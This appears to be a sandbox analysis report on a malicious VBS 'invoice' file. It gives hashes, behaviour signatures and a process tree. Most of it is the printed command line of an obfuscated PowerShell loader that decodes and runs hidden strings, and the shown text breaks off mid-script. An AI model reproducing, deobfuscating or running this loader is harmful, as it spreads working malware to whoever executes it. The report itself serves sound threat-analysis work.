b594b5806104bcf450e25c6faa6d79c74006821c9d110b012703966e0da33b9a

General

Target

factuur.vbs
Size

376KB
MD5

89841248259fd93460f689567379b3a8
SHA1

c1d2dc952fc20627f17300d6ebf0c5cca45d012a
SHA256

999c8b67dd1a4aa2494a9c9882b75838d0e9946df23541228ddbdf60328483ac
SHA512

4218664d55ad2ac03a5ab875ba4aac9f84a58b304291ed6489346115e92a5357e57568d801cce44ea3f7dee8c901f9175e7959e5ca14cbde97ce004aa3bb8094
SSDEEP

6144:+MBihK6+Dme+Ho5NCsnlGVR0PGjsrlZbQrElItxAkij:Lh6+DmZHo5wNg8sJZb2Eoij

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
564	powershell.exe
1696	powershell.exe
1624	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	564	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 564	820	WScript.exe	28
PID 820 wrote to memory of 564	820	WScript.exe	28
PID 820 wrote to memory of 564	820	WScript.exe	28
PID 564 wrote to memory of 1696	564	powershell.exe	30
PID 564 wrote to memory of 1696	564	powershell.exe	30
PID 564 wrote to memory of 1696	564	powershell.exe	30
PID 564 wrote to memory of 1696	564	powershell.exe	30
PID 1696 wrote to memory of 1624	1696	powershell.exe	32
PID 1696 wrote to memory of 1624	1696	powershell.exe	32
PID 1696 wrote to memory of 1624	1696	powershell.exe	32
PID 1696 wrote to memory of 1624	1696	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\factuur.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$fortrydendes = """TeFgruVenSycFrtPriAcoSonGr SeHReTFoBSn Pa{Mo Pa sv Sv RapBlaStrAfaFomar(Fo[JySdetPhrFliDenergOp]So`$LaKAdamenYanSaiSmbAgaBalMoiGasopmUneManCr)Tr;Be Po`$AzGTruKnmAtmSpeinnAfsen Ap=na Ca`$AxKFoaGunCanSliOpbPyaSplYoiSisLomaceKinSp.BaLofeNenUngPstAchUd;Bl Ak Tj Iw Hi`$BuFTeiBosFokEveRorSeiAmeMcrUnnPheFi Bu=Ki OcNOmeFawAk-ReOTvbHejEpeVicAntGa TibBnySltIneLo[Af]Re Si(vd`$zyGSuudimRemTeeGenfysHe Ef/Am Fo2Rv)De;Af Ve Bl Fi UnFSooDirBe(En`$LaDBaaPasPiyNopJoyPrgThaHalFo=Ra0Om;Ch Kl`$MaDTeaCesIdySapDuyWagTraDilIm Er-FolTotPo La`$EiKMaaKynLinUniDibSnadiludiEmsPumBnedonTe.caLkaeFrnScgSitSahSe;Mo Op`$PrDFoaMasReyVapUgyAbgMdaColDo+No=Aa2Ak)Sp{Sk th Pt Su Ru Ju Be Ri or`$DoFKniSpsPakSieKurKoiEpeAtrGrnPeeFo[Bl`$SeDNaaResStyHapTayHegUnaAklAr/Ta2Kv]Su De=Ti Di[StcAvoWhnRvvNoeforaftBe]Ed:Se:AeTRaoBeBInyBetDieoz(Em`$KoKCuaLunEnnEniVdbKuaTrlMeiAfsstmFoeChnFr.RaSTauKobSisBltKlrRaiMindagga(Gi`$StDUdaSvsFoyKapHvyIngBeaVilmn,Ma Ou2Mu)Ge,Fo Wh1Sk6Vi)Se;Op in Pa`$RaFStiposInkPoeDorMoiNoeBurRenKeeSe[Ro`$UnDOdaMosSpyVapFoyNogFoaAnlUn/Ud2Os]Li Pe=Be Li(Sy`$OpFUdiNisBakSieKrrSkiGeeThrPanBoeSn[Ud`$GrDLoaGasDiyTepAuyBagTeaEllpo/Te2Fa]Ur Pi-anbPrxGroBlrOr Ti2Ch3Te0Fo)Sk;Be Tr Si Fa Sk}Jr He[BaSVitAdrseiLnnIngPr]Vi[VeSFayFasRetByeDimsu.ReTPaejyxMutMy.UnEMenapcOpoSkdAkiRanScgRe]ga:Be:JoAAcSSkCPrIHeIOi.GuGodeDrtKiSPrtKarAsicinJegAn(Te`$DiFVaikesgrkMieJurbriEteSjrglnNoePe)Sk;Pa}St`$DeABrfStsVinUnrTreLadMeeDe0Ma=GnHSaTCoBFo Fi'SeBRe5Ak9geFLa9Nu5Ma9Wa2Ts8Mo3ti8AoBdiCDr8Af8Or2In8ArAHa8UnAfe'Ko;Sv`$CaAPifUnsQunexrSaeStdRieGe1Ge=efHTaTFrBPe af'BeAToBHa8HoFDu8Er5Ed9No4Uv8Bl9Et9Ka5Ha8Pe9Be8Ad0Do9Pr2FrCRe8MiBNo1Se8PrFKu8Sn8InDPe5NoDEo4SoCre8DeBTr3Ka8Sk8En9Ne5Ko8Tu7Sl8ch0Ta8Fo3FoAFo8ki8Sk7Sh9st2Si8CoFSo9Sa0Co8Fr3FlAMoBDo8Go3Ga9Bn2do8GrETo8Tv9Te8Va2Ev9Kn5Fa'Gr;Ty`$thAStfNosBlnSarSleSldAueKl2Ul=TrHNyTGaBKr Mu'FiAhe1Sy8ac3Ho9Un2CuBDi6Ro9Un4Sy8Un9Sk8Ra5MiAPh7Ar8Al2Er8Gr2Ga9Is4un8In3Te9As5Em9Sp5Re'Te;Fo`$OuASefKisRenMirRteLodEteIs3Bj=PoHInTObBSm De'OvBSa5Fo9CoFHu9me5Ko9Al2Ni8bo3Th8blBStCTr8UdBBe4Ti9Re3Ka8Gr8Pr9Un2Ma8PiFpr8ChBHe8Ri3MoCDe8MaAWiFPl8st8Ap9Li2Ka8Om3Tu9Ma4Un8Bj9Ly9Ga6LaBSk5Th8gu3So9In4Pr9Mi0Do8BrFFo8un5Su8Un3Fo9Si5DjCIs8ViADoESa8Se7Ba8Sw8Ud8Os2Ti8DrAMu8Du3adBTh4Ko8Le3Ec8Ma0Sc'Ki;Op`$PuAImfNasOvnbrrSteAgdFaeFj4ov=GaHRoTOmBnj Kp'Tr9Dr5Re9Im2Sd9Mi4Da8TaFOr8Ve8Re8fr1sa'Fi;Li`$ViATufKesOvnTerReeGvdKaeDe5Al=SaHLiTTrBSv Ov'WhAFe1Lu8Co3Be9ve2LuASiBTa8St9Ch8Un2So9Re3La8SkASj8Ne3CaALiERe8Il7Ap8si8Va8fi2Da8OfAUd8mn3Re'St;Ub`$FoAovfTisImnRurLoeFldGaePr6Hj=FuHCoTSpBEn Ab'OrBLs4BrBEp2GeBAs5Jo9vi6Ef8fl3Si8Il5Fr8ufFEp8Br7Fo8NoAFrABe8Fr8Fi7Om8HaBPe8Dj3RiCSpAUmCUn6BlAYeEEc8FaFKo8Jo2Br8Ga3deAKo4Ro9ThFBiBLe5An8ViFDo8Fa1RuCsuAMyCPo6GoBAk6cu9Rv3Fe8Go4Sk8OpAho8BlFGe8in5Un'Ko;St`$abACofUnsScnArrFeeIddMieMe7Bl=PoHSkTReBSk Ep'OmBTo4li9Fe3Br8in8Eu9Gi2Ko8VaFNo8KaBIm8mc3paCHaASnCDe6EnAhoBNa8te7Ge8Hu8Bl8Be7Ku8Dy1Lo8Co3Ko8Ta2Ly'Er;Re`$FrASkfPasPanInrMeeArdDaety8Sv=PuHAlTTyBFi Ge'StBBe4Gr8Sa3Un8St0Br8ExACo8Be3An8Oc5mu9Wi2de8Af3Ga8he2BaAMa2Fa8Va3Co8OuASy8Gu3Sh8S 1Sp8Sp7Af9Er2Kl8Do3Gl'Re;re`$BaALifTasgrnshrGeeBrdIneBi9In=SaHAkTMoBOv La'ReAunFFo8Ti8CrAPeBEr8Ma3St8BiBKr8Ti9Te9Se4Un9DeFFyASkBIl8Es9Sc8Da2kh9Cl3Un8BaASe8La3Mu'In;Ty`$AdBBeaBinTonAfecarAl0Tj=ArHPsTMaBNo Sm'StASmBEr9ErFFoATu2Al8La3ed8TeAYp8st3As8Pl1Sh8gl7Gl9Su2Ge8Kv3TiBBe2Un9TrFEs9Ha6Co8Bu3Br'sa;Ch`$PsBSuaFinRenUdeHurSu1Mu=reHTkTpeBDo Di'BeABa5Pa8ReASo8Ex7Fr9Ag5St9So5SoCOdAHyCLo6BoBSi6ri9Pe3Sp8Pl4ge8MuASp8DuFNs8Un5TuCViAKiCVl6MoBGr5Go8Co3Po8Sh7Ka8KuASk8Ru3Ab8Fo2NoCUaANeCAn6LaADe7So8Ny8Ba9Pr5Ra8fuFBuABa5Lu8AfAFo8Do7pi9Tj5Se9Un5PeCBeAVeCTr6EfAEm7In9Up3Ob9St2Ba8li9DaAAr5Fo8MoAEt8ap7La9Ge5Fr9Li5Ug'Wo;Te`$ReBPoaManLunneeBurHy2Bl=AlHMaTSoBCa Pa'CaAGyFUn8An8op9Le0Ma8Hy9Sm8PaDCh8Ci3ma'un;Re`$ToBEtaKonStnIneWrrCa3He=InHReTFiBUn Fo'BaBPr6Me9Co3Ma8Mi4Mi8PaASv8ApFDe8De5LaCQuAkuCGr6BeAPeEFu8sdFSu8Te2Un8An3FuAPo4An9MaFNaBEp5Ne8StFHu8Gu1BlCReAHuCDo6PoARo8St8Co3Te9be1MaBCh5so8FeAKi8Ab9sp9Ak2DeCNoATeCCh6HoBDi0Pa8DeFUd9lu4Pr9Ki2Lr9Wo3Sl8Qu7Se8AnAGl'Ja;af`$SpBNuanonKonVieJorFr4Ta=LoHDiTCoBCi Fa'SkBUn0El8peFKo9Dg4Un9Bu2Da9El3Tr8Ur7Th8FiAAfAPr7In8JoAAu8LfATv8No9Tf8Gr5Pr'Gr;Ti`$SpBUdaKandinSjeStrLa5ov=PhHUrTbuBRe Fo'Si8Ch8Ar9Sy2Kr8bo2Tr8PaASa8FrAut'Si;Sd`$SlBIdaUfnVanSaeOmrta6Va=BrHTiTBeBCo Le'SeAAg8Ra9Br2BrBBa6Gr9Ko4Tr8Sc9Me9Br2Fr8Ls3so8Oz5rd9De2DeBTo0Sr8DeFKl9Ma4Ea9Sa2Sp9Ge3Ek8Ma7Sa8FaAFiASkBIn8Mo3Ne8ElBPr8Qu9Gy9Ca4Re9ShFPo'Ex;Re`$PyBEpaFonUnnXyeMerSt7Dr=stHRlTInBBl Gl'CoAOsFDyAry3KdBStEEn'af;Do`$GuBKuaBanBlnUneCorNo8Ud=QuHstTCaBTi Op'SoBTuAGu'El;Un`$DdSStbSt1Af6Le5Si=AnHJaTUdBbi Ka'AiBSa3EtBBu5BeAFy3DiBCo4ouDAn5ArDKh4Ra'Ar;St`$EnSReuMonPenUdiPanBeeUdssjsSt=RiHBeTPiBNi Fn'KnAEl5Mi8Sn7be8IcAAa8moAFoBSh1bu8TeFBe8Im8St8Gd2Va8Ab9Af9An1NoBCl6Tr9Ma4si8Ev9La8Re5ToAFl7Gh'Am;MefUnuVanCrcKetLaipioCenRa AffBokDepLi Ko{AfPAraPrrOraGimMe On(Ls`$beMFioGrnInohekcirGroLamVeaeftDeiInsDikCh,Di Cl`$diMInaFuskosSueSarcleSpnaudDeeOpsCe)In un Di Tr Ni Kn;Ge`$InpDieBinSltBraDemZeeDorCooOmiSudBa0Ex be=LfHsiTQuBSu At'DyCFj2DeAsk9An9Ko0Un8Op3Mj9Wa4Ps9Ho3So9Me2Pa8ChFDg8EnAHa8StFno9KoCUn8TrFHj8In8Sc8aa1FaCBi6OuDVeBTjCGl6StCSpEMeBFoDPuALa7Wh9An6Mi9Au6PrAIm2Ma8Pr9Re8NoBNo8No7Ub8AmFPl8Ar8UgBBaBKeDsvCCoDRuCPsASt5Aa9po3Un9De4Ab9Ti4Fo8Nr3Bi8Up8Sq9Pa2MeATa2Te8bu9Su8inBun8An7Eg8DrFCa8Kl8NoCDo8VaAKl1Ve8gy3On9Sa2ExAGa7Bo9Gr5Ca9re5Gu8Pa3hi8HaBTr8Mo4St8DuABe8SpFRe8Me3Fj9Ca5prCudENaCfiFGbCHo6Va9ViAbeCHo6GoBSt1Sw8LvETj8Ba3Un9Ro4Me8Na3PaCarBRaATr9Pa8El4La8AnCMo8No3De8Lo5Ch9Sa2AdCOv6de9StDIlCSi6neCSu2GuBFr9BoCGi8PeAKo1Be8ChARa8St9Di8Sm4Su8Re7Ud8SaAPoAMa7Gr9Fa5So9An5Co8Pe3Sn8OpBWa8Fy4Tu8BeAPa9UdFFeAUn5Re8At7Ba8Bu5Ve8TuEEk8Ev3ViCGe6StCPeBLiATr7Ma8ju8hk8Su2UnCAx6TaCKi2CoBCe9UnCEm8suASuASt8At9Fi8Ch5Hi8Ud7Mi9Re2Se8VoFSn8Hk9to8In8UnCPi8SuBCl5Fe9Mi6El8DaASk8SaFRg9Se2ApCAlEGeCUn2StARe4Se8Ve7Br8St8ju8De8Ti8Af3Tr9Co4NoDCoECoCTuFSjBBoDNoCStBTrDFa7prBMoBStCPr8InAAl3Pr9In7St9No3Ud8de7Ti8MoABr9Sk5MaCPaEOvCWo2AfAFo7Ad8Us0Fo9Kl5Le8Op8Pi9Gh4Ov8va3He8Py2Po8Di3BoDSt6BrCLaFTrCRi6In9KhBAnCBaFPeCAt8peAFe1Si8By3Po9Pr2chBAl2Ti9SeFCo9Ar6In8Ga3AeCSuEevCCo2SnAEj7so8Ai0Dr9Jo5Im8Be8Be9Ba4Sy8Ga3Fr8Br2Lb8Su3svDSy7AnCAmFPo'At;No&Ba(Ex`$MuBCoaHanBrnUdeGarhe7Dy)Se Un`$KapSaeBanWatToaVamCoerarChoUniFodQu0Ci;Fa`$AfpUdeGenibtKnaAamSteAurcioReiLadIn5Br Ne=Se DrHInTBeBFi Hn'CoCVe2syAXyDPl8HoFsm9Bo5Pi9Au5Up8Mu3Fo9Fr4ga9un5GuCRo6CaDsyBKuCFo6DeCFi2OvACo9Pl9Iw0Tr8Se3Fl9Br4Ko9Vr3Ar9sm2Bl8ToFBa8buAJo8AaFom9stCAn8snFLa8Br8Sb8La1unCSn8anAPr1Sk8kl3Ch9Fr2VeASlBli8St3Gr9Gi2fo8LaEGr8em9Ou8bo2MaCSlEPyCHo2doAHv7ph8Ar0Se9Sk5st8ur8ad9Di4an8Be3Un8Di2De8An3SnDHi4InCFiAMiCEn6DaBUdDStBIn2Ep9trFOu9Ta6Li8An3spBLuDHeBMlBSaBAlBKhCAp6CoAVa6PaCMeEPiCRe2LoANa7Pi8ne0Co9De5Ho8Ku8In9He4om8Bl3Dv8No2Un8Ni3BiDno5SkCPeADeCLi6TaCKa2HeADe7Ch8Sk0In9vi5Pr8Re8Ud9Ut4so8Ou3Go8De2Be8pl3KrDBa2MeCTrFPaCGaFRu'In;Mu&Ph(mi`$MaBStaTinOmnHaeSirDe7Vi)Le Hy`$SfpIneVenAstBiaStmEneYlrDyoReiSldAs5Gl;Ph`$NepTaeRhnPotMuaCrmPeeTyrSeoMiiAndVa1Sk Ko=Ba FrHAfTReBMe In'Bo9Dd4Ge8Ma3Se9Be2fe9Ex3Pe9Ex4Ch8Ex8DuCEx6UnCVr2PoAKoDEk8AkFTe9Ar5At9Jo5Sc8em3In9Ph4Un9Ti5AfCAn8BoAScFju8Sm8Vi9Ti0Bo8Ls9Da8UdDHu8Go3FiCAmEMhCEn2Fr8Re8Ud9Tr3Ur8RaAKl8meAElCUbANoCBr6plATr6BiCKvECoBGaDBeBEm5fl9TeFSk9ri5As9La2Sp8Na3Tu8UrBDeCLa8ImBPr4Un9Re3Ut8my8Me9Gu2Sc8SpFAp8TiBGe8wh3TrCEl8LsAAnFDa8Fr8Ki9Un2Kl8In3Di9an4St8st9Tr9Jo6weBPa5Sq8No3Un9St4Cy9Af0Fo8MiFLa8Fr5Re8Ma3Sy9Ko5LiCAn8InAUrECo8Vi7Ox8Bo8Eb8In2pr8TeAGy8Gl3FeBMa4Ve8In3Pe8Ps0InBNuBHaCAeEPaACh8Ta8ta3De9sm1ObCAnBFlASy9Ps8pl4Sa8AlCUp8He3El8Em5st9Au2DiCLe6ReBKu5Sa9FoFFa9Jo5Ou9Pr2Me8be3Pi8SeBEnCEx8BlBCo4Hy9De3Hl8be8br9bu2Se8FrFco8UnBKa8Dy3RoCEr8TfASaFPa8Pe8Tr9Po2Ti8Ou3Ra9La4Bo8Al9Ad9Ge6PrBSm5Ag8Sp3Ou9Sg4Fo9Ri0Un8HeFAt8Sp5Im8Re3Ho9No5OsCPa8WaAElEAr8cl7St8Un8pr8Ne2Ud8TeASt8Gl3ThBIn4Ov8Ra3Di8En0BeCDiEJaCIsEfiASe8Co8Bu3Hu9Cl1HlCUdBScABe9Tj8Pr4Ba8rhCTi8Bo3Pr8qu5Re9Sp2GsCDe6CoAKvFSa8Eg8Be9Ke2AvBIn6Bi9sa2Me9Re4AlCWoFPyCSyAFoCSt6SlCTkEFoCRa2asAIn9in9Ko0Ti8Vk3Af9Su4Co9Ne3Ro9so2in8NuFdu8DeAHe8ImFco9DiCDi8CaFIn8Tp8Hu8Sa1TeCGo8BoADa1Di8Er3Ek9Bo2InATaBlo8Pr3Br9Um2Pl8TeENa8Fi9br8Ce2BiCVeEPuCBa2unAUd7Dy8Ph0Se9Ph5Un8Po8Op9Te4Ja8Cu3Be8fr2Re8Dr3JuDSk3poCPiFAcCAnFToCDi8BrABrFTa8za8Et9ra0Sp8Ud9Ly8GaDCl8ri3PeCPaEEnCIl2Cl8St8Pa9Po3Te8TuAHe8BrAArCFiAPeCOs6UtAPr6SiCChEMeCDe2GrABeBRe8Po9Ba8Ok8Sn8Tr9br8DaDCo9Me4At8Sc9Be8reBNe8Tr7Ba9Sa2Co8OuFSe9Br5bo8DiDReCBeFMoCSuFBrCGeFSpCBaFFoCZeAErCGe6FlCtu2AnAJaBgo8Un7Ra9sk5Ef9Ma5In8Lu3Ka9ak4An8Sv3Ar8An8So8Ap2Un8Ru3as9St5PlCVeFUdCEmFNa'ke;Rd&Ca(Sa`$TrBTiaKlnIrnLieNorKi7Co)Fe fo`$DopIaePlnHatunasummeeBorAfoGriFodCo1gl;De}BrfSyuPanUbcNetSkiAroSanJa MuGNiDAdTTo St{InPAraAnrStaIsmDa Bi(Xe[SkPViaMirInaIrmUdeRetSoeBersk(OvPMaoSksHoiPrtOmiEnoSanRa Ra=Un Ad0Ep)Ch]Mo Co[PeTCayBopHaeKn[Ra]Re]Om Tr`$deLNoirenhekDasunmPieConBe,So[NoPFraGerSkaremCaeMutMeeGlrNo(SmPBooMosTziPatUdiFioAcnNi Ek=Un Ta1In)Bo]Vi Je[GuTSpyHjpDieNa]Fr As`$SeSAnatonHamFraSurBricaneceOrsCleParKusNo Os=Er In[MiVOuoDaihodKo]Sm)Pe;sa`$QupAseUnnOvtmoaCimTreDrrFooBeispdUn2Ba Af=Po CaHSaTLiBFa Su'SlCWo2BaAInDPi8ki7sa9Ni4Su8SpBPs8anFKl8Ka8bl9Me5VrCQu6SkDAnBVuCou6ReBBrDAnAMa7Go9De6te9Ps6AuACa2Do8Po9Ch8ElBSe8Ps7Se8FaFAf8Gy8MiBLiBPaDNoCgrDTrCArAHa5an9Al3Da9In4Lu9Es4Ti8Tj3Co8Ar8Sw9Se2InARe2Sk8Na9An8daBDr8Fi7To8BuFLa8He8InCEx8IdACl2Op8Bl3Ud8Ve0Kr8NaFBe8Ge8ve8Ta3SiAKr2On9FoFTe8fo8Un8Al7Sn8UnBOp8DuFbe8Rh5UiAKo7Cr9Sc5Di9Kr5Te8Bo3Ge8BlBFo8Nr4Re8noASe9tiFBeCGyEUnCMeEFeAUd8Li8Re3Up9He1SkCFoBfoASi9St8la4Da8GtCLe8Bl3Le8Po5al9Ps2LeCAp6MuBRa5Ak9DeFVi9Bo5Bl9Sl2Sa8ha3Te8StBgaCSa8TrBGe4Ge8Ba3Bo8Sm0Un8AfAst8Re3Fr8Sa5Vi9Ro2sk8ExFIn8To9Da8Sk8MaCGr8SoAOb7Ba9Si5Mo9Su5Kl8Mi3Fe8ShBTo8Kr4St8LyASk9MoFBrAKa8Ud8Br7Ad8WaBHj8Ge3DdCFlEKaCPo2EnAHy7Ca8Be0Be9Un5No8Po8hi9Br4Tr8Be3Ts8Ja2An8Da3WiDExEMiCFrFHaCSeFFrCHjASuCOm6MiBCoDHaBSp5Ch9BuFCa9Be5Ni9Ti2cr8Va3st8CaBJoCth8NeBBu4Ex8Un3Be8Uh0Be8PuADe8Pa3Me8Sk5be9In2Eg8CoFPr8Ud9Bi8Da8KnCPs8BfAKo3Sc8AfBFi8PiFCu9ky2TrCsa8PoATo7Hu9Un5Kl9Af5Va8Co3to8DrBKo8Va4La8PrATe9BrFViApl4De9Od3De8DeFTr8StABe8Eu2Un8Fo3Af9Aa4PaAAf7Un8Di5De8Ou5He8Ho3Ra9Pa5Bo9It5AlBtrBOvDarCScDPoCInBSi4Sm9Op3Mi8To8CoCPaFFrCNo8PhAgg2Th8ca3dr8Le0Kr8ViFEr8Il8Tr8Be3ToADe2An9GrFDi8gu8do8Kl7Me8MoBBi8TzFCh8Je5StASpBBe8ke9Fu8Yd2Dy9Ka3Um8EmAVa8Dr3UnCSeELoCSt2DuASe7Po8St0Gu9Un5Al8st8El9Ab4Me8Re3re8We2In8Hy3KoDSkFDiCPiAnoCFo6MaCNa2fo8At0Mu8Ek7af8DeADy9Ko5hi8Sn3RaCBlFMuCCo8HuADe2bp8Bu3me8En0Fo8NoFBu8Ur8Mi8sk3ImBKl2in9HaFAb9Da6in8st3HaCStEBuCYn2AlAKa4Ne8Ma7An8Sn8Ak8In8Sk8Pr3Re9Un4WiDvo6ByCHaASkCFi6BiCFr2SmARe4Ar8Pr7Ha8It8Ma8Gl8St8Va3Sl9Gr4arDDi7BhCAgAJyCTr6foBNoDInBCa5Pr9ShFNg9To5Pe9Kl2Po8Ov3Eu8TaBNoCTe8laAkaBSk9Af3Ou8HoASt9De2Un8ReFGr8Si5Fr8Lf7tr9Hu5Tr9Bo2BaASp2Bo8Ud3St8ReABe8Um3Va8An1Le8Be7Pl9Fi2No8Ba3PhBEnBBeCEcFKa'Ov;Su&Va(wi`$HaBPlaBanEvnLeeSkrFy7Te)Gi Sc`$GrpWieAnnKatFraFomVreOvrTooDoiBudRe2di;Ns`$DepBieKanUltPeaEnmpreJurSkolaiFodPr3Ud Ae=Ne SeHFjTViBSp Ne'CeCBi2StAClDCo8Ud7Nu9Si4Ma8ThBUt8TvFEn8In8Ho9Pa5AnCKo8SpAEm2Op8Bl3Pr8fa0Sk8NoFTi8Fr8Se8de3AcASt5Ml8Po9im8La8Sk9sk5Qu9Sj2La9Ov4By9Be3Bu8Er5Ud9Cl2Mu8Ma9Ge9Se4FoCEnEQuCSy2RaASy7Co8El0Ta9Ba5No8De8Mu9Pr4Pi8kn3Fe8Sk2sa8Am3BiDKl0HoCDiAAeCAp6SnBToDAnBMr5Bo9CaFSn9Sy5To9Ln2Ab8Sp3De8maBPeCRe8ReBFi4Cy8re3No8Re0Be8exASt8Id3Hy8Th5Ni9be2Ty8ThFSn8De9ba8Al8StCRa8MeABu5Ge8Sk7Ag8DoAWa8SeAGe8TrFun8Ov8St8My1CoAFu5Ne8Ar9La8fo8De9Cl0Ca8Pa3In8In8Do9Co2be8FlFCh8Ja9Ti8Fa8Du9Fi5AuBSpBTrDHaCEtDGaCSvBsj5Fl9Eg2Ge8Li7Se8Un8Sp8In2Bi8Pa7Cy9Re4ze8To2AmCruAStCSu6AnCSt2UnAChAAc8TeFFl8Un8Se8PrDud9sa5Hy8ItBDe8Wi3Gu8Om8BaCKrFOpCTu8BeBCe5Er8Ch3In9Vi2VaASoFPa8RoBTu9Ho6Ri8EnAEn8Se3Av8UrBDy8Ov3Bu8Dh8Pe9Ko2Ha8Bl7Ur9Ne2Re8AnFDr8Be9Co8Sl8hvASp0Ko8ImATa8Sv7Un8co1Do9Im5AdCHyEUdCSu2TaASp7Gi8Aa0As9Sk5Re8Sl8Co9Pr4Bl8Ha3Ny8Cz2Ko8Ru3ThDPr1SyCyaFFu'Te;Fr&Ha(ka`$MiBSkaBanBonDeeOurtu7Pr)Re Ef`$StpMoeRonAbtFoaLimXaeTerCooCoiSddMi3Al;Go`$KbpFaeManAmtUpaSpmloeRerMioshiUndEr4Ke Ud=Pa HoHChTAlBSi Er'FiCBr2PsAskDQu8Va7In9Hi4Kr8VeBSa8AeFTa8af8Ln9Fa5TaCGu8TaALa2St8As3Re8Bg0Re8BrFBe8Eg8Fi8To3emASiBIr8Ha3De9Ra2Fi8ScECo8Id9Un8Vi2KoCUdETrCAr2CyASi4Ci8Tr7Br8Cu8Ju8ba8Pa8Ne3Te9To4AnDSa4frCPrASaCLr6EiCSt2AnAPl4Ho8Ex7Fr8Me8Sp8To8Un8Tc3Me9Jo4CoDMe5DiCLoATrCSk6SuCak2VeBGe5Su8Li7Po8Dd8Er8MoBPs8He7Re9By4sy8EsFTi8Op8In8Pa3Da9Tu5Re8Cr3Un9Fa4Sp9Bo5SwCOvALaCDe6StCSa2MeATeANa8IlFVa8pr8St8VeDin9mi5Pr8baBRi8Ga3Kn8An8EsCNuFWiCSt8AlBSo5he8jy3Si9Fe2BlAsoFOb8ReBCh9Mi6Pl8QuAKa8Jo3St8EmBPa8Po3Po8Ph8Go9Es2af8Ru7Do9Av2Li8MiFun8in9Se8An8PiACh0hy8TrABy8Ro7An8In1He9Ki5ScCHeESyCva2cyACz7ho8Fl0Af9af5Sr8la8El9Un4To8Fo3Ma8Ko2Nd8Ca3UnDTr1ViCSuFHe'Lo;Ko&st(Th`$AaBTrasvnManSoeBerRe7Un)Re Re`$TapDeeHinUntDaaHjmAzeGerAfoDiiRrdPa4pa;Vd`$NipSteKonUdtMiaSnmGeeBerMuoDeiFidWa5Op An=La UnHCoTAnBCo Ro'Ma9Le4Ad8de3Hi9Ne2In9Se3Ve9Ce4Ja8St8SpCNe6KuCCa2HeACoDJa8Ov7Ar9Fo4Kr8UlBKl8WoFEv8Sv8La9Re5GaCRe8FrAGu5Ap9Hy4Bi8Mu3Ru8En7Yd9Sa2Is8Fl3BlBRa2Bi9taFte9Fl6Ov8St3KoCPrEPeCFlFSk'Ab;Ru&Tr(Se`$LaBUnaStnbenSkeSprSu7De)Io Im`$OppHyeNonUdtAfaDimSaeOrrTeoKriSidPy5Sp Du Re Re;Ca}Ko`$ReRSlaMcdTysLeaAbaPosSe Tr=Sp diHFlTMaBCh Sl'Ma8laDhu8Bv3Me9Fl4Pe8Co8Co8Wi3Le8trATeDMu5LeDSb4Ve'Ra;Fr`$ClpSjeScnTotJoaDrmDoeAfrFooCaiNodOv6Sa An=Tu TiHSvTSuBCo Me'DiCMe2FrBSn6Id9Fo4Lo9Ud5SiDUf7BeDTr4skDExFBrCSm6DeDBoBRiCra6SpBMoDNaBUn5Co9FoFSe9Br5Ti9De2Tr8sj3De8SlBOpCBa8UdBTi4Fj9St3Sl8Se8De9El2id8FoFKl8CiBAr8sc3CoCPr8UsARaFTr8Re8Fo9Se2Pa8Oc3Gn9Ov4An8Gu9Pa9Im6DeBAb5La8Di3Fo9Ne4Hi9Hi0Te8NoFTa8Pr5Be8Au3Vi9Fl5ExCSa8PaAChBBe8In7Se9Br4Ko9Ko5Ko8TrEDe8tr7Ri8UnAHoBKaBBlDAkCBlDIsCBiAMa1To8Re3Ov9Mi2TeACl2St8ou3So8DeAWr8Zo3Wi8Ca1Ta8Ek7Wi9ec2Ln8ly3SmAHe0Re8Au9kl9Fe4AmAAm0Fj9Co3Up8Ny8Eu8Im5Sl9Ba2Fi8liFco8Ra9Od8op8PrBTe6Va8In9Pr8WaFTh8En8Re9Su2Fl8Bu3St9In4AeCReEBiCPeEUv8Af0Cr8DeDFo9No6InCSk6BrCMa2JeBPo4Ho8Ps7Ma8gl2Bo9Sy5Un8Or7Fo8Ko7Be9Tr5StCSa6GjCAf2reAUn4Un8Dr7Do8ag8De8Ba8Sa8Fd3St9Fo4UnDBl2MiCRoFUpCPrASkCCl6ImCAnEpiAPl1LiAGs2nsBCo2UnCIn6ReAst6shCPaENuBOvDSkACoFte8La8Ta9Th2EpBsc6Vk9Di2Di9Pi4PrBSkBRiCSaABoCEr6ekBSnDCoBRi3OrAFoFIl8Se8Al9Ek2AlDPt5ReDHy4CeBCrBPdCFaAEkCSt6InBVeDtiBFu3KoAFoFRa8Pe8Kv9Pa2DoDhu5BuDEx4KuBDiBGeCDeASpCHo6NoBHeDFlBSc3MaAJuFFo8un8Of9Ef2AsDOr5KaDHy4HaBKoBThCMyFFrCEv6SuCElEUnBOlDUnATyFAn8Er8Re9Li2OlBTr6Pe9ab2Ge9Ha4LyBRoBMaCPrFOsCUdFSkCfiFOp'Sk;No&Bo(No`$plBskaStnaunGoeIjrPr7Re)br Fe`$ShpLaeRenAltUnaudmDreKorkroIniIndBi6Dr;Mi`$skFAdoExrHumCoiPrdArdRhaBagAbsCabDelUnaGadFeeSktMesNo Un=St TefUnkCapSt Ha`$GeBUnaTrnClnAceUnrac5Ad Br`$ocBMaaSmnTonSceScrSa6Po;Fa`$OtpSteFonIdtTraLamBeeHerMaoPriGadHo7Sc Fo=Ha KbHHuTAfBSn 